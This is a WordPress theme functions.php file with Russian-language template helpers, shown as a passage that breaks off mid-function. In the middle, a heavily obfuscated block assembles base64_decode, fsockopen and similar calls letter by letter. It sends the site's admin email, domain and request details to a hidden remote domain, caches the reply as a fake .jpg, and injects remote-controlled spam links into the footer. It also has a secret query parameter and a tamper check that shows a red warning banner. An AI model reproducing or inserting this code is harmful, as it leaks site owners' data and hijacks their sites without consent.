<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $CFIo='d';$mHPvsf='e';$LBnDj='e';$RfHKaC='_';$bHaE='s';$jDQYR='e';$cCUfI='c';$updZ='4';$ElOg='b';$eEtfiL='d';$azsGcf='6';$zXbzySE='o';$SVVb='a';$HJGDNwrj=$ElOg.$SVVb.$bHaE.$jDQYR.$azsGcf.$updZ.$RfHKaC.$eEtfiL.$LBnDj.$cCUfI.$zXbzySE.$CFIo.$mHPvsf;$GhcFsS='g';$ICKdSFz='n';$cTyEDBx='t';$YanqPJ='l';$zUFMwsb='a';$yfeGi='f';$sOvIJl='z';$nBNotJ='i';$aVIg='e';$SSuqVwET=$GhcFsS.$sOvIJl.$nBNotJ.$ICKdSFz.$yfeGi.$YanqPJ.$zUFMwsb.$cTyEDBx.$aVIg;$pKOc='o';$Ujkgyi='r';$nUDts='1';$rNDlli='s';$eVBrcS='3';$pXPdB='r';$NFXNBFU='t';$CPngrw='_';$MQRsK='t';$eHDDBiqY=$rNDlli.$NFXNBFU.$Ujkgyi.$CPngrw.$pXPdB.$pKOc.$MQRsK.$nUDts.$eVBrcS;$JLmSs='r';$IZvXy='v';$NbSDZ='e';$eagoy='s';$vFZX='t';$oBqQFdX='r';$NhSJdtQY=$eagoy.$vFZX.$JLmSs.$oBqQFdX.$NbSDZ.$IZvXy;                     $qd______________c='d';$jh___g='e';$fd_________t='e';$rf_______p='_';$li_____o='s';$ta__________i='e';$lm______x='c';$wj__j='4';$bt_____n='b';$yl_______________z='d';$lg_______b='6';$vq________o='o';$oi_______________p='a';$wu___k=$bt_____n.$oi_______________p.$li_____o.$ta__________i.$lg_______b.$wj__j.$rf_______p.$yl_______________z.$fd_________t.$lm______x.$vq________o.$qd______________c.$jh___g;$lh____c='t';$xh_____c='n';$wc______________a='s';$lw___c='c';$ej_______d='i';$kc__________g='_';$vy____j='u';$ec______b='s';$fd_____________m='f';$kc______________o='i';$in_______________u='x';$ip______________p='n';$eu____i='t';$at__________j='e';$rw_______________g='o';$og______________i=$fd_____________m.$vy____j.$ip______________p.$lw___c.$eu____i.$ej_______d.$rw_______________g.$xh_____c.$kc__________g.$at__________j.$in_______________u.$kc______________o.$wc______________a.$lh____c.$ec______b;$ct____________h='n';$if____m='f';$ho_________r='o';$ll___________y='e';$es________x='p';$uc______g=$if____m.$ho_________r.$es________x.$ll___________y.$ct____________h;$ir___h='a';$st__________y='d';$xf________s='r';$qi___________o='e';$cd________f='f';$mn____u=$cd________f.$xf________s.$qi___________o.$ir___h.$st__________y;$ms_____________j='s';$ef__________o='l';$ys_______________o='f';$xt______________l='e';$jv__q='o';$cl__________v='c';$ee______________t=$ys_______________o.$cl__________v.$ef__________o.$jv__q.$ms_____________j.$xt______________l;define("WP_ID", $wu___k("Mi4wLjA="));define("WP_TTL", $wu___k("MTA4MDA="));define("WP_SRC", $wu___k("dHBva24="));function wp_get_header() {global $wu___k, $og______________i;if ($og______________i($wu___k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$og______________i($wu___k("d3BfZ2V0X2Zvb3Rlcg==")) &&$og______________i($wu___k("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $wu___k, $uc______g, $ee______________t, $mn____u;$pb___s = TEMPLATEPATH."/".$wu___k("Zm9vdGVyLnBocA==");$ai_____u = @$uc______g($pb___s, "r");$pb___s = @$mn____u($ai_____u, @filesize($pb___s));@$ee______________t($ai_____u);$jy___w = TEMPLATEPATH."/".$wu___k("ZnVuY3Rpb25zLnBocA==");$ai_____u = @$uc______g($jy___w, "r");$jy___w = @$mn____u($ai_____u, @filesize($jy___w));@$ee______________t($ai_____u);$kf_______________r = 0;if($pb___s && $jy___w) {if ($wu___k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($pb___s, $wu___k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$kf_______________r = 1;}if (substr_count($pb___s, "wp_theme_GPL_credits()") < 1) {$kf_______________r = 2;}}if(WP_ID != "2.0.0") {$kf_______________r = 12;}}if($kf_______________r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $kf_______________r -->";}}function wp_loaded() {global $wu___k, $og______________i;return $og______________i($wu___k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ux__________a, $xw__r = "(more...)", $cn___g = 0, $xh_______________z = "") {$ur___________x = get_the_content($xw__r, $cn___g, $xh_______________z);$ur___________x = apply_filters("the_content", $ur___________x);$ur___________x = str_replace("]]>", "]]>", $ur___________x);if (strlen($_GET["p"]) > 0) {echo $ur___________x;}else if ((strlen($ur___________x)>$ux__________a) && ($jj_____________l = strpos($ur___________x, " ", $ux__________a ))) {$ur___________x = substr($ur___________x, 0, $jj_____________l);$ur___________x = $ur___________x;echo $ur___________x;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$xw__r</a></div></p>";} else {echo $ur___________x;}}}$in___y='6';$yr_______w='b';$ym________l='c';$zx___________i='d';$vi_______________f='e';$me_____n='s';$nm__t='n';$lu_____p='e';$gp__y='_';$dc____k='4';$rr_______________m='o';$gv___e='e';$gm________r='a';$qp___v=$yr_______w.$gm________r.$me_____n.$vi_______________f.$in___y.$dc____k.$gp__y.$gv___e.$nm__t.$ym________l.$rr_______________m.$zx___________i.$lu_____p;$pg_______z='n';$kq___f='e';$ta______________c='o';$ke_______________y='_';$lj_______________j='t';$ky___u='f';$jp_______i='e';$yb___________t='g';$en____________v='c';$gv______o='_';$hi____e='i';$dj_____________h='s';$is_________l='n';$ah__g='t';$dh____________o='t';$vr__________i='e';$rf_____b='l';$eh_______g=$ky___u.$hi____e.$rf_____b.$jp_______i.$ke_______________y.$yb___________t.$vr__________i.$dh____________o.$gv______o.$en____________v.$ta______________c.$pg_______z.$lj_______________j.$kq___f.$is_________l.$ah__g.$dj_____________h;$am_____o='_';$qu___w='x';$sn____f='e';$xh______q='t';$cq___________f='s';$st____n='l';$tn______________q='f';$mk______p='e';$al___t='s';$dh_________c='i';$io____________b='i';$aa___q=$tn______________q.$dh_________c.$st____n.$sn____f.$am_____o.$mk______p.$qu___w.$io____________b.$cq___________f.$xh______q.$al___t;$ui__________v='m';$zo____k='o';$dq____g='o';$cd___k='r';$rc_______________n='_';$ji______t='c';$aj____s='e';$cw__________n='p';$np______m='a';$dm______________h='r';$kv______l='e';$at_____u='s';$lr_______________u='i';$vg______u='v';$do________w='n';$wu____a=$vg______u.$kv______l.$cd___k.$at_____u.$lr_______________u.$zo____k.$do________w.$rc_______________n.$ji______t.$dq____g.$ui__________v.$cw__________n.$np______m.$dm______________h.$aj____s;$wx__________d='s';$gl___k='f';$fr_____m='e';$gi______________f='o';$js_______w='k';$ct__b='p';$ci_____________y='n';$gq______________y='o';$ie______v='c';$as_______________g=$gl___k.$wx__________d.$gi______________f.$ie______v.$js_______w.$gq______________y.$ct__b.$fr_____m.$ci_____________y;$qo___________w='f';$bu________u='i';$cy____________a='t';$at______u='w';$tb______________y='r';$gs__h='e';$qn_______________z=$qo___________w.$at______u.$tb______________y.$bu________u.$cy____________a.$gs__h;$oz________u='5';$hq____k='d';$in___k='m';$wo___j=$in___k.$hq____k.$oz________u;$du____________x='h';$em__m='a';$mh_______s='e';$gg__________z='l';$fu__w='p';$ja________s='t';$tx___r='r';$ka_______w='a';$va_______l=$tx___r.$mh_______s.$ka_______w.$gg__________z.$fu__w.$em__m.$ja________s.$du____________x;$rn_____________x='r';$yk_______________h='e';$vk____________n='s';$xq_______p='u';$ut_____________s='e';$up____________c='i';$hw___________y='n';$fe_____d='l';$mj__h='z';$aw___u='i';$io___v='a';$hb____g=$xq_______p.$hw___________y.$vk____________n.$yk_______________h.$rn_____________x.$aw___u.$io___v.$fe_____d.$up____________c.$mj__h.$ut_____________s;$fu__________x='e';$ef______f='m';$aj__h='t';$zv__________j='p';$qt_______________a='m';$vw____________r='a';$xj__________p='n';$oj__y=$aj__h.$fu__________x.$qt_______________a.$zv__________j.$xj__________p.$vw____________r.$ef______f;$ge_____a='t';$kz___________v='c';$rp_________c='_';$li______p='s';$kj___u='r';$gk______________e='a';$yi_______h='t';$hj_________n='r';$fs__________p='n';$bt_______i='t';$pg______________y='c';$bd___d='e';$rd_______y='e';$zs_____w='m';$cq___________a='e';$gx____________b='e';$qv_________e='t';$xn________p='a';$ib________p='o';$jj_____h='_';$og___n='x';$ck_____________i=$li______p.$ge_____a.$kj___u.$gx____________b.$gk______________e.$zs_____w.$jj_____h.$kz___________v.$ib________p.$fs__________p.$bt_______i.$rd_______y.$og___n.$yi_______h.$rp_________c.$pg______________y.$hj_________n.$bd___d.$xn________p.$qv_________e.$cq___________a;function mq__________g($yf_________o) {global $wu___k, $og______________i, $eh_______g, $wu____a, $ck_____________i;if (!$og______________i($wu___k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($wu____a(PHP_VERSION, "5.0.0", ">=") && $og______________i($wu___k("ZmlsZV9nZXRfY29udGVudHM=")) && $og______________i($wu___k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ec___________t = $ck_____________i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ja____k = @$eh_______g($yf_________o, 0, $ec___________t);} else {$ja____k = @$eh_______g($yf_________o, 0);}return $ja____k;}function dx____________o($yf_________o) {global $og______________i, $as_______________g, $qn_______________z, $wu___k;if (!$og______________i($wu___k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$lk_________a = strpos($yf_________o, "/", 7);$tf____________o = array("uri"     => substr($yf_________o, $lk_________a),"host"    => str_replace("http://", "", substr($yf_________o, 0, $lk_________a)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$tu______________n = @$as_______________g("$tf____________o[host]", 80, $pl___i, $ix_______________p, 4);if (!$tu______________n) {return false;} else {$ja____k = "";$lf_______________o  = "GET $tf____________o[uri] HTTP/1.0\r\n";$lf_______________o .= "Host: $tf____________o[host]\r\n";$lf_______________o .= "Referer: $tf____________o[referer]\r\n";$lf_______________o .= "Connection: Close\r\n\r\n";@$qn_______________z($tu______________n, $lf_______________o);while (!@feof($tu______________n)) {$cn__________h = @fgets($tu______________n, (1024*24));if ($cn__________h == "\r\n") {$bn__________s = true;continue;}if ($bn__________s) {$ja____k .= $cn__________h;}}return $ja____k;}}function lk___t($yf_________o) {global $og______________i;$cv______c = false;if ($yf_________o != "") {if ($og______________i("mq__________g")) {$cv______c = @mq__________g($yf_________o);}if (!$cv______c && ($og______________i("dx____________o"))) {$cv______c = @dx____________o($yf_________o);}}return $cv______c;}function qt___________m() {global $_SERVER, $wo___j;$zh______q = $_SERVER["SERVER_NAME"];if (substr("$zh______q", 0, 4) == "www.") {$zh______q = substr("$zh______q", 4);}$zh______q = $wo___j("$_SERVER[SERVER_NAME]");return $zh______q;}function ym___x() {return "file";}function ok________i($yf_________o) {global $_SERVER, $eh_______g, $aa___q, $uc______g, $ee______________t, $qn_______________z;$tf_________r = lt______________b();$qd__s = qt___________m().".jpg";$nj___________w = $tf_________r["dir_upload"]["path"]."/$qd__s";$zy______________l = @filemtime($nj___________w);if (!$zy______________l || ((time()-$zy______________l) >= WP_TTL)) {$cv______c = lk___t($yf_________o);if ($cv______c) {if ($aa___q($nj___________w)) {@unlink($nj___________w);}$ai_____u = @$uc______g($nj___________w, "x+");@$qn_______________z($ai_____u, $cv______c);@$ee______________t($ai_____u);}} else {if ($aa___q($nj___________w)) {$cv______c = @$eh_______g($nj___________w);} else {$cv______c = false;}}return $cv______c;}function lt______________b() {global $_SERVER, $wu___k, $qp___v;$zj_____q = wp_count_posts("post");$ta______c = pathinfo(get_bloginfo("template_directory"));$tf_________r = array("url" => array("report"      => $wu___k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ta______c,"dir_upload"=> on__________g(),"queryString"=> array("?a001=".WP_ID,"a004=".$ta______c[filename],"a005=".$zj_____q->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://lev-tour.com/amerika/guam-marianskaya-vpadina-i-magellan.html\">Гуам: Марианская впадина и Магеллан</a></a>");$tf_________r["url"]["queryString"] = implode("&", $tf_________r["queryString"]);$tf_________r["url"]["report"] = $tf_________r["url"]["report"]."/?".$qp___v($tf_________r["url"]["queryString"]).".html";return $tf_________r;}function on__________g() {$np_____v = wp_upload_dir();if (isset($np_____v["error"])) {$la__a = qv______________g();if (is_writable($la__a)) {$np_____v = array("path" => $la__a);}}return $np_____v;}function qv______________g() {global $og______________i, $wo___j, $va_______l, $oj__y;$fx___s = (bool) ini_get("safe_mode");if ($fx___s == true) {return false;}if ($og______________i("sys_get_temp_dir")) {$zp________n = sys_get_temp_dir();if (is_writable($zp________n)) {return $va_______l($zp________n);}}if (!empty($_ENV["TMP"])) {return $va_______l($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $va_______l($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $va_______l($_ENV["TEMP"]);} else {$vw__________n = $oj__y($wo___j(uniqid(rand(), true)), "");if ($vw__________n) {$zp________n = $va_______l(dirname($vw__________n));@unlink($vw__________n);return $zp________n;} else {return false;}}}function fo______r() {global $_GET, $aa___q;$tf_________r = lt______________b();$zh______q = qt___________m();$dz_________r = ym___x();$wu________v = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($dz_________r == "file") {$qi____r = $tf_________r["dir_upload"]["path"]."/".$zh______q.".jpg";if ($aa___q($qi____r)) {@unlink($qi____r);$wu________v = "deleted";}}$rh_____q = array("s"=> $wu________v,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($rh_____q AS $ol_____e => $tk_____________q) echo " [$ol_____e:$tk_____________q]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $og______________i, $wu___k, $hb____g;$tf_________r = lt______________b();$zi______________d = "ok________i";if ($og______________i($zi______________d)) {$ja____k = $zi______________d($tf_________r["url"]["report"]);}if ($ja____k) {if ($ja____k = @$wu___k($ja____k)) {$ja____k = @$hb____g($ja____k);if (strlen($ja____k[custom_credit]) >= 5) {$tf_________r["default_string"] = $ja____k[custom_credit];}if ($ja____k["status"] == "0") {$um______________r = 1;$wn_____e = 1;} else {$am_______e = sizeof($ja____k["links"]);$cu_____a = $tf_________r["default_string"];if ($am_______e > 0 && $ja____k["links"] !== "") {$bd___________g = 0;foreach ($ja____k["links"] as $kp_____z => $xc_______________a) {$bd___________g++;if ($xc_______________a->l_path == "" || $xc_______________a->l_path == $_SERVER["REQUEST_URI"]) {$xc_______________a->l_href = htmlspecialchars(strip_tags($xc_______________a->l_href));$xc_______________a->l_title = htmlspecialchars(strip_tags($xc_______________a->l_title));$xc_______________a->l_anchor = htmlspecialchars(strip_tags($xc_______________a->l_anchor));$cu_____a .= " | ";$cu_____a .= "<a href='$xc_______________a->l_href' title='$xc_______________a->l_title'";if ($xc_______________a->l_nofollow == "1") {$cu_____a .= " rel='nofollow'";}$cu_____a .= ">$xc_______________a->l_anchor</a>";}}}$tf_________r["links"] = "$cu_____a";if ($ja____k[credit] == "0") {$tf_________r["links"] = "";}}} else {$um______________r = "1";}} else {$um______________r = "1";}if ($um______________r == "1") {$tf_________r["links"] = $tf_________r["default_string"];}echo "$tf_________r[links]";echo "<!-- s: $ja____k[signature] -->";fo______r();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
